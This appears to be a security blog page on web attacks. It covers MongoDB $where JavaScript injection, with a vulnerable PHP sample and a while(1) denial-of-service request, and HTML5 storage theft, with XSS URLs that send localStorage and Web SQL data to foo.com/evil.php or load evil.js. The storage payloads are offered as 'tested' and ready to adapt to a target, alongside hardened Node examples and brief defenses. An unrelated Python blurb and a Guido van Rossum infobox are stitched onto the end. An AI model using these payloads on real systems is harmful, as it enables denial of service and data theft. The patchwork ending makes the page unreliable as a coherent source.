NoSql Injection

Server-side JavaScript injection vulnerabilities are not limited to application code. NoSQL database engines that execute JavaScript containing user-specified parameters can also be vulnerable. For example, MongoDB allows JavaScript functions to be used as query specifications (the $where operator, among others). Since MongoDB collections do not have strictly defined schemas, using JavaScript for query syntax lets developers write complex queries against disparate document structures. Suppose we have a MongoDB collection that contains some documents representing books, some representing movies, and some representing music albums. The following JavaScript query function selects every document in the collection that was written, filmed, or recorded at the specified time:

function() {
    var search_time = input_value;
    return this.publishingTime == search_time ||
           this.filmingTime == search_time ||
           this.recordingTime == search_time;
}

If the application developer were building this application in PHP (for example), the source code might look like this:

$query = 'function() { var search_time = \'' . $_GET['year'] . '\'; ' .
         'return this.publishingTime == search_time || ' .
         'this.filmingTime == search_time || ' .
         'this.recordingTime == search_time; }';

$cursor = $collection->find(array('$where' => $query));

This code uses the value of the request parameter "year" as the search parameter. However, just as in a traditional SQL injection attack, because the query is assembled ad hoc (query syntax concatenated with user input), the code is vulnerable to a server-side JavaScript injection attack. For example, this request is an effective DoS attack against the system, since the injected infinite loop runs inside the database's JavaScript engine for every document it evaluates:

http://server/app.php?year=1995';while(1);var%20foo='bar

Credits: SQL Injection Attacks and Defense.
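To make the boundary break concrete, here is the same string-building pattern reproduced in Node.js beside a builder that keeps user input as data. This is an added example, not code from the page or from the book it credits; the field names follow the page, and compilesAsJavaScript is a hypothetical helper that only checks whether a source string parses and never runs it.

```javascript
// Added example (not from the page): vulnerable $where construction next to
// a structured query. compilesAsJavaScript is a hypothetical helper used only
// to show the injected payload yields well-formed JavaScript; it never calls it.

// VULNERABLE: user input is spliced into JavaScript source that mongod will
// execute (via the $where operator) for every document it evaluates.
function buildWhereClause(year) {
  return "function() { var search_time = '" + year + "'; " +
         "return this.publishingTime == search_time || " +
         "this.filmingTime == search_time || " +
         "this.recordingTime == search_time; }";
}

// Compile (but never invoke) a source string. A successful compile means the
// attacker's input became statements rather than a syntax error.
function compilesAsJavaScript(src) {
  try {
    new Function("return (" + src + ");");
    return true;
  } catch (e) {
    return false;
  }
}

// HARDENED: validate the parameter and build a plain query document.
// No JavaScript travels to the server, so the value can never become code.
function buildStructuredQuery(year) {
  // Query-string parsers such as Express's turn ?year[$gt]= into an object,
  // which would let an attacker smuggle operators like $gt or $ne into the
  // query document; reject anything that is not a string before looking at it.
  if (typeof year !== "string") {
    throw new TypeError("year must be a string");
  }
  if (!/^\d{4}$/.test(year)) {
    throw new RangeError("year must be exactly four digits");
  }
  // Assumption: the *Time fields are stored as numbers. A structured query
  // matches by type, so the value must match how the documents store it.
  const y = Number(year);
  return {
    $or: [{ publishingTime: y }, { filmingTime: y }, { recordingTime: y }],
  };
}

// The request from the page, URL-decoded: ?year=1995';while(1);var%20foo='bar
const payload = "1995';while(1);var foo='bar";

function main() {
  console.log(buildWhereClause(payload));                       // while(1) is now a statement
  console.log(compilesAsJavaScript(buildWhereClause(payload))); // true
  console.log(JSON.stringify(buildStructuredQuery("1995")));
  try {
    buildStructuredQuery(payload);
  } catch (e) {
    console.log("rejected: " + e.message);
  }
}

main();
```

The type check matters as much as the pattern check: removing $where stops code injection, but a query document built from an unvalidated object still lets an attacker inject MongoDB operators, which is the NoSQL analogue of the same bug.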

Client-side Storage using HTML5: really secure or just an abuse?

HTML5 introduced new ways to save large amounts of data on the user's PC through the browser (Web Storage, i.e. localStorage and sessionStorage, and the Web SQL Database; use Chromium or Chrome to see how the latter works). Attackers can steal or modify this data, online or offline. If a web application that uses client-side storage is vulnerable to XSS, an attack payload can read or modify the content of known storage keys on the victim's computer. If the web application loads data or code from local storage, it is also quite powerful to inject malicious code there: it will be executed every time the application reads it, which keeps the compromise alive after the original XSS is gone.

Working technique (tested by the author; adapt the snippets to the target):

Storage Object Enumeration

var ss = "";
for (i in window.sessionStorage) {
    ss += i + " ";
}
var ls = "";
for (i = 0; i < localStorage.length; i++) {
    ls += localStorage.key(i) + " ";
}

Database Object Enumeration

var db = "";
for (i in window) {
    if (window[i] == "[object Database]") {
        db += i + " ";
    }
}

Extracting Database Metadata (Web SQL is backed by SQLite, so its schema tables are queryable)

SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()

One Shot Attack:

http://blah_blah.com/page.php?name=<script>document.write('<img src="http://foo.com/evil.php?name=' %2B globalStorage[location.hostname].mykey %2B '">');</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql("SELECT * FROM client_tb", [], function(tx, result){ document.write('<img src="http://foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B '">'); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js></script>

Note that %2B is the URL-encoded form of +, which would otherwise be decoded as a space in the query string. globalStorage was a Firefox-only API that has since been removed; on current browsers the first payload reads localStorage instead.


Defenses

Website: avoid saving sensitive data on the user's machine, never execute values read back from client-side storage, and clear the client-side storage whenever possible (for example on logout).

Web browser: users should regularly inspect the HTML5 client-side storage their browser has saved and delete what they do not recognise.
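To tie the enumeration snippets and the defenses together, here is an added example (not from the original post) that runs under Node with an in-memory stand-in for window.localStorage. It generalises the page's key enumeration to dump key/value pairs, shows the "application loads code from storage" failure mode, and puts a loader next to it that treats stored values strictly as data and removes anything malformed. The key names (sessionToken, prefs, bootstrap), the schema and the sample values are constructed for the demonstration.

```javascript
// Added example (not from the original post). MemoryStorage, PREF_SCHEMA and
// the key names are assumptions made for this demonstration.

// Minimal Storage implementation with the same interface as window.localStorage.
class MemoryStorage {
  constructor() { this.map = new Map(); }
  get length() { return this.map.size; }
  key(i) { return Array.from(this.map.keys())[i] ?? null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(String(k), String(v)); }
  removeItem(k) { this.map.delete(k); }
  clear() { this.map.clear(); }
}

// Everything an XSS payload on the same origin could read: key -> value.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// VULNERABLE: whatever sits under "bootstrap" is executed as code on every
// load. One XSS that plants a payload here keeps running after the XSS is fixed.
function loadBootstrapUnsafe(storage) {
  return new Function(storage.getItem("bootstrap") || "return {};")();
}

// HARDENED: the stored value is parsed as JSON and filtered through an
// allow-list of keys and types; anything malformed is dropped and the key removed.
const PREF_SCHEMA = { theme: "string", fontSize: "number" };

function loadPrefsSafe(storage) {
  const raw = storage.getItem("prefs");
  if (raw === null) return {};
  let parsed;
  try {
    parsed = JSON.parse(raw);
  } catch (e) {
    parsed = null;
  }
  if (parsed === null || typeof parsed !== "object" || Array.isArray(parsed)) {
    storage.removeItem("prefs");
    return {};
  }
  const prefs = {};
  for (const [key, type] of Object.entries(PREF_SCHEMA)) {
    if (Object.prototype.hasOwnProperty.call(parsed, key) && typeof parsed[key] === type) {
      prefs[key] = parsed[key];
    }
  }
  return prefs;
}

// Constructed sample: a victim's storage after an XSS payload planted a
// bootstrap script and tampered with the preferences (fontSize has the wrong type).
function plantSampleStorage() {
  const s = new MemoryStorage();
  s.setItem("sessionToken", "constructed-session-token-0001");
  s.setItem("prefs", '{"theme":"dark","fontSize":"12px","__proto__":{"admin":true}}');
  s.setItem("bootstrap", "globalThis.pwned = 'planted'; return { theme: 'dark' };");
  return s;
}

function main() {
  const storage = plantSampleStorage();
  console.log("dump:", dumpStorage(storage));        // includes the session token
  loadBootstrapUnsafe(storage);
  console.log("after unsafe load, pwned =", globalThis.pwned); // 'planted'
  delete globalThis.pwned;
  console.log("safe prefs:", loadPrefsSafe(storage)); // { theme: 'dark' }
  console.log("after safe load, pwned =", globalThis.pwned);   // undefined
}

main();
```

The unsafe loader is the pattern the defenses warn about: once attacker-controlled text reaches new Function (or eval, or an injected script tag), clearing the XSS does not clear the foothold. The safe loader never evaluates stored text, and removing the key on failure is the "clear whenever possible" advice applied at the one point the application already has the data in hand.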

LSO (Flash Local Shared Object) storage location (Linux only; other platforms are not covered here):

Linux:

/home/$user/.macromedia/Flash_Player/#SharedObjects

Python

Python is a programming language that lets you work more quickly and integrate your systems more effectively. You can learn to use Python and see almost immediate gains in productivity and lower maintenance costs.

Python runs on Windows, Linux/Unix, Mac OS X, and has been ported to the Java and .NET virtual machines.

Python's creator, Guido van Rossum (infobox):

Born: 31 January 1956 (age 56), Netherlands
Nationality: Dutch
Alma mater: University of Amsterdam
Occupation: Computer programmer, author
Employer: Google
Known for: Python programming language
Awards: Award for the Advancement of Free Software (2001)



Python is a remarkably powerful dynamic programming language that is used in a wide variety of application domains. Python is often compared to Tcl, Perl, Ruby, Scheme or Java. Some of its key distinguishing features include:
very clear, readable syntax
strong introspection capabilities
intuitive object orientation
natural expression of procedural code
full modularity, supporting hierarchical packages
exception-based error handling
very high level dynamic data types
extensive standard libraries and third party modules for virtually every task
extensions and modules easily written in C, C++ (or Java for Jython, or .NET languages for IronPython)
embeddable within applications as a scripting interface



